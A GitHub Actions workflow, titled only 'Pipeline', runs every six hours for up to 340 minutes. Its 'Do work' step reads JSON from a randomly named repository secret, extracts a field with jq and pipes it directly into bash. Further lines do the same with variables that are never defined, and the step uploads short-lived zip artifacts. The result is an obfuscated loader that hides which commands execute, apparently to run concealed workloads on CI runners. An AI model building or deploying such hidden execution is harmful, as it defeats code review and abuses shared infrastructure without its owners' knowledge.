name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '7 0,6,12,18 * * *'
jobs:
  launch:
    runs-on: ubuntu-latest
    timeout-minutes: 340
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Do work
        env:
          mxwt33: ${{ secrets.mxwt33 }}
        run: |
          printf '%s' "$mxwt33" | jq -r .qlra87 | /bin/bash
          echo $itace1171 | jq -r .kpqt0 | /bin/bash
          printf '%s' "$sbop1788" | jq -r .co3 | /bin/bash
          printf '%s' "$gcc028" | jq -r .xwg08 | /bin/bash

      - name: Archive data
        uses: actions/upload-artifact@v4
        with:
          name: 75SYod3o
          path: "*.zip"
          retention-days: 1
